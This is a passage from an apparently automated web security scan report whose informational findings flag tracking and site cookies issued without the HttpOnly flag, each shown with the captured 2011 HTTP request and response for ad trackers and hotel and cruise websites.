Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 12:47:06 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1442346&t=2
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 165

<html><body><p>Redirecting to <a href="http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2">http://ad.yieldmanager.com/pixel?id=1442346&amp;t=2</a></p></body></html>
12.27. http://servedby.flashtalking.com/segment/modify/ah3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/ah3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/ah3;;pixel/?name=HiltonHomepagecomDE HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343,ah3)|f20004352=(s:1-t:13702351)";Path=/;Domain=.flashtalking.com;Expires=Wed, 02-Oct-13 12:52:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 12:52:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;
12.28. http://servedby.flashtalking.com/segment/modify/ahr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/ahr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/ahr;;pixel/?name=HiltonHomepageGlobalUK HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2013561;type=hilto339;cat=hilto778;ord=9654915034770.965?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343,ahr)|f20004352=(s:1-t:13702351)";Path=/;Domain=.flashtalking.com;Expires=Wed, 02-Oct-13 12:52:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 12:52:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;
12.29. http://statse.webtrendslive.com/DCSKIoc2rNH8I36lrbe6wexE5_5B9O/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /DCSKIoc2rNH8I36lrbe6wexE5_5B9O/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DCSKIoc2rNH8I36lrbe6wexE5_5B9O/dcs.gif?&dcsdat=1317646383809&dcssip=www.kimptonhotels.com&dcsuri=/&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Kimpton%20Hotels:%20Boutique%20Hotels,%20Luxury%20Travel%20and%20Chef-Driven%20Gourmet%20Restaurants&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.sp=KC-Corp&WT.dl=0&WT.ssl=0&WT.es=www.kimptonhotels.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1317646383811&WT.co_f=50.23.123.106-4086325760.30173190 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.kimptonhotels.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAgAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohOFgAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:52:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAhAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohODUkAABqwiU4asIlOFwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITjAdAAAasIlOGrCJTgAAAAA-; path=/; expires=Thu, 30-Sep-2021 12:52:42 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
12.30. http://statse.webtrendslive.com/dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif?&dcsdat=1317646441146&dcssip=www.grandcafe-sf.com&dcsuri=/&dcsref=http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Downtown%20San%20Francisco%20French%20Restaurant%20%26%20Brasserie|%20Grand%20Cafe&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.sp=KC-GRAND&WT.dl=0&WT.ssl=0&WT.es=www.grandcafe-sf.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f=1&WT.vtvs=1317646441148&WT.co_f=50.23.123.106-4086325760.30173190&WT.tsrc=Kimpton%20Hotels.com HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAiAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohODUkAAE6wiU4asIlOl0sAACuwiU4bsIlOGAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITjAdAABOsIlOGrCJTl0eAAArsIlOG7CJTgAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1317646441146&dcssip=www.grandcafe-sf.com&dcsuri=/&dcsref=http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Downtown%20San%20Francisco%20French%20Restaurant%20%26%20Brasserie|%20Grand%20Cafe&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.sp=KC-GRAND&WT.dl=0&WT.ssl=0&WT.es=www.grandcafe-sf.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f=1&WT.vtvs=1317646441148&WT.co_f=50.23.123.106-4086325760.30173190&WT.tsrc=Kimpton%20Hotels.com
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAjAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohODUkAAFOwiU4asIlOl0sAAESwiU4bsIlOXOIAAFSwiU5UsIlOGAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITjAdAABUsIlOGrCJTl0eAABEsIlOG7CJTgAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

12.31. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsx8czs1erp17368wkcsn8pc_9z2q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsx8czs1erp17368wkcsn8pc_9z2q/dcs.gif?&dcsdat=1317646384775&dcssip=www1.hilton.com&dcsuri=/en_US/hi/index.do&WT.co_f=50.23.123.106-4086325760.30173190&WT.vt_sid=50.23.123.106-4086325760.30173190.1317646384777&WT.vt_f_tlv=0&WT.srch=null&WT.z_brand=Hilton&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Hotels%20by%20Hilton%20-%20Hotel%20Reservations,%20Deals,%20and%20Room%20Rates&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fi=Yes&WT.fv=10.3&WT.tv=1.1.1&WT.dl=0&WT.es=www1.hilton.com/en_US/hi/index.do&WT.cg_n=Home&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAhAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohODUkAABuwiU4asIlOFwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITjAdAAAbsIlOGrCJTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:52:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAiAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAGMCiU6R+ohODUkAABuwiU4asIlOl0sAABuwiU4bsIlOGAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAABjAolOkfqITjAdAAAbsIlOGrCJTl0eAAAbsIlOG7CJTgAAAAA-; path=/; expires=Thu, 30-Sep-2021 12:52:43 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
12.32. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif?dcsuri=/nojavascript&WT.js=No HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 13:20:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtOTc0NjQ0ODY0LjMwMTc5NzkxAAAAAAAAAAABAAAAl0sAAKC2iU6ftolOAQAAAF0eAACgtolOn7aJTgAAAAA-; path=/; expires=Thu, 30-Sep-2021 13:20:32 GMT
Expires: Tue, 1 Jan 1980 01:01:01 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
12.33. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=7871bv11074&tz=5&ref=&page=http%3A%2F%2Fwww.cruises.com%2F&uuid=7200E557-607F-4F1A-82DB-75086671DFA2&rnd=11115697 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Mon, 03 Oct 2011 12:40:44 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Tue, 02-Oct-2012 12:40:44 GMT; Path=/

GIF89a.............,...........D..;
12.34. http://www.cruises.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; __utmx=229343950.; __utmxx=229343950.; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.3.9.1317645663627; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 12:41:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Location: /uhoh.asp?errormsg=&pagetype=500&handlederror=393229
Content-Length: 181
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/uhoh.asp?errormsg=&amp;pagetype=500&amp;handlederror=393229">here</a>.</body>
12.35. http://www.cruises.com/ajaxhtml/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /ajaxhtml/filterdynamic.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxhtml/filterdynamic.do?http://www.cruises.com/promotion/weekend-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/html; charset=utf-8
Accept: text/html, */*; q=0.01
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
